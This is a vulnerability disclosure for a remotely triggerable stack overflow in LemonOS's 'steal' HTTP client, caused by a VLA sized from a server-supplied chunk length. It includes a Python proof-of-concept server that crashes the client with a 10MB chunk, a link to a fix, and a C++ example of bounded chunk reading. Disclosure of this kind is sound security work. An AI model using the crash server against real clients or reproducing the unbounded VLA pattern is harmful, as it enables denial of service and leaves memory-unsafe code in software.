Lemon OS | Remote stack overflow
Information
| Software Type | Operating System |
|---|---|
| Software Name | LemonOS |
| Affected Version | nightly-2024-07-12 |
| Software Vendor | LemonOS |
| Software Link | https://github.com/LemonOSProject/LemonOS |
| Severity | High |
| CVSS Score | 7.5 |
| CVE Link | CVE-2025-9001 |
| Affected Assets | 10+ |
| Date of Discovery | April 10th 2025 |
| PoC Exploit | https://github.com/LemonOSProject/LemonOS/issues/60 |
Description
This vulnerability was identified as a result of collaborative efforts between myself and 0xVpr: I identified the vulnerability and 0xVpr mitigated it by providing a fix.
This report details a stack overflow vulnerability in the steal HTTP client (the curl equivalent for LemonOS), identified during an analysis conducted on April 10, 2025. The vulnerability arises from the use of a variable-length array (VLA) in the `HTTPGet` function, specifically at line 361 of `main.cpp`, where `char recieveBuffer[chunkSize];` is declared.
The `chunkSize` value is controlled by an external HTTP server response, allowing an attacker to trigger a crash or potentially escalate the impact with precise manipulation.
Reproduce
Download and put the following two files in the same directory:
- https://github.com/LemonOSProject/LemonOS/blob/master/Applications/Steal/main.cpp
- https://github.com/LemonOSProject/LemonOS/blob/master/LibLemon/include/Lemon/Core/URL.h
Compile the code:
```sh
g++ -g -o steal main.cpp -lssl -lcrypto
```
Create a Python server that responds with a 10MB chunk to any incoming request:
```python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 80))
s.listen(1)
print("Listening on 127.0.0.1:80")
conn, addr = s.accept()
conn.recv(1024)  # read (and ignore) the client's request
response = b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
chunk_size = 10485760  # 10MB
payload = b"A" * chunk_size
response += f"{hex(chunk_size)[2:]}".encode() + b"\r\n"  # chunk-size line, in hex
response += payload + b"\r\n"
response += b"0\r\n\r\n"  # terminating zero-length chunk
conn.sendall(response)  # sendall: a plain send() may write only part of a 10MB buffer
conn.close()
s.close()
```
Ensure Python 3 is installed and then run this:
```sh
$ python3 server.py
```
Think of this as a normal server that makes a 10MB installer available to users when they request it.
Run the steal binary you compiled above by sending a request to the server:
```sh
./steal "127.0.0.1"
```
This triggers a segmentation fault and crashes the program.
For a more extensive and detailed proof of concept, see the issue I opened on GitHub:
https://github.com/LemonOSProject/LemonOS/issues/60
Mitigation
0xVpr has modified main.cpp and fixed the bug:
https://gist.github.com/0xHamy/f54f672ddf49e41e550350448e4c93a9
You can now run the same attack again and serve a chunk_size of 100MB (10x the amount we used for our initial tests) and you will notice that steal no longer crashes.
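To illustrate the root cause described above and the shape of a fix, here is an added C++ example that is not code from LemonOS, from steal, or from 0xVpr's gist. It reads a chunked HTTP body the safe way: the server-supplied chunk size is parsed with an overflow guard and capped at a hypothetical limit (`kMaxChunkSize`, chosen for this example), and data is received into a fixed-size stack buffer in a loop, so the peer decides how many iterations run but never how much stack is allocated. `ByteSource` is a stand-in for a socket so the example runs offline on constructed input; the 10MB chunk is the same size the PoC server sends.

```cpp
// Added example: bounded chunked-body reader (not LemonOS/steal code).
// Replaces the `char recieveBuffer[chunkSize];` VLA pattern with a fixed-size
// buffer plus a hard cap on the size a remote server may request.
#include <algorithm>
#include <cstddef>
#include <cstdio>
#include <cstring>
#include <string>
#include <utility>

// Hypothetical limits chosen for this example, not values from the project.
constexpr std::size_t kMaxChunkSize = 1u << 20;   // refuse chunks larger than 1 MiB
constexpr std::size_t kReadBufferSize = 4096;     // buffer size fixed at compile time

// Parse the hex size on a chunk-size line ("a000\r\n" or "a000;ext=1\r\n").
// Returns false on malformed input or when the size exceeds the cap, so a
// hostile server can never dictate how much memory we set aside.
bool parseChunkSize(const std::string& line, std::size_t& out) {
    std::size_t value = 0;
    std::size_t digits = 0;
    for (char c : line) {
        int d = 0;
        if (c >= '0' && c <= '9')      d = c - '0';
        else if (c >= 'a' && c <= 'f') d = c - 'a' + 10;
        else if (c >= 'A' && c <= 'F') d = c - 'A' + 10;
        else if (c == ';' || c == '\r' || c == '\n') break;  // extension or end of line
        else return false;
        // If value * 16 would already exceed the cap, stop before it can overflow.
        if (value > (kMaxChunkSize >> 4)) return false;
        value = value * 16 + static_cast<std::size_t>(d);
        ++digits;
    }
    if (digits == 0 || value > kMaxChunkSize) return false;
    out = value;
    return true;
}

// Minimal stand-in for a socket: a byte source we can recv() from in pieces.
class ByteSource {
public:
    explicit ByteSource(std::string data) : data_(std::move(data)) {}
    // Like recv(): copy up to `len` bytes, return how many were copied (0 = EOF).
    std::size_t recv(char* out, std::size_t len) {
        std::size_t n = std::min(len, data_.size() - pos_);
        std::memcpy(out, data_.data() + pos_, n);
        pos_ += n;
        return n;
    }
    // Read up to and including the next '\n'; false at end of input.
    bool readLine(std::string& line) {
        line.clear();
        while (pos_ < data_.size()) {
            char c = data_[pos_++];
            line.push_back(c);
            if (c == '\n') return true;
        }
        return !line.empty();
    }
private:
    std::string data_;
    std::size_t pos_ = 0;
};

// Read a chunked body into `body`. The chunk size only controls how many
// times we loop over the fixed buffer, never how large the buffer is.
bool readChunkedBody(ByteSource& src, std::string& body) {
    std::string line;
    char buffer[kReadBufferSize];   // not a VLA: size is a compile-time constant
    while (src.readLine(line)) {
        std::size_t size = 0;
        if (!parseChunkSize(line, size)) return false;   // malformed or over the cap
        if (size == 0) return true;                       // last-chunk marker
        std::size_t remaining = size;
        while (remaining > 0) {
            std::size_t n = src.recv(buffer, std::min(remaining, sizeof buffer));
            if (n == 0) return false;                     // peer closed mid-chunk
            body.append(buffer, n);
            remaining -= n;
        }
        if (!src.readLine(line) || line != "\r\n") return false;  // CRLF after chunk data
    }
    return false;   // no terminating zero-size chunk
}

// Constructed input: a chunked body with one data chunk of `size` 'A' bytes.
std::string makeChunkedBody(std::size_t size) {
    char hdr[32];
    std::snprintf(hdr, sizeof hdr, "%zx\r\n", size);
    return std::string(hdr) + std::string(size, 'A') + "\r\n0\r\n\r\n";
}

int main() {
    std::string small, huge;
    ByteSource a(makeChunkedBody(5000));
    ByteSource b(makeChunkedBody(10485760));   // the 10MB chunk from the PoC server
    bool smallOk = readChunkedBody(a, small);
    bool hugeOk = readChunkedBody(b, huge);
    std::printf("5000-byte chunk: %s, 10MB chunk: %s\n",
                smallOk ? "read" : "rejected", hugeOk ? "read" : "rejected");
    return 0;
}
```

The important property is that nothing the server sends reaches an allocation size: an oversized chunk-size line is rejected before any data is read, and an accepted chunk is drained through the 4 KiB buffer however large it is. A real client would also want to bound the total body size it is willing to accumulate, which this example leaves to the caller.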
Proof of Concept (PoC) Video
Posted on: May 23, 2025 01:10 AM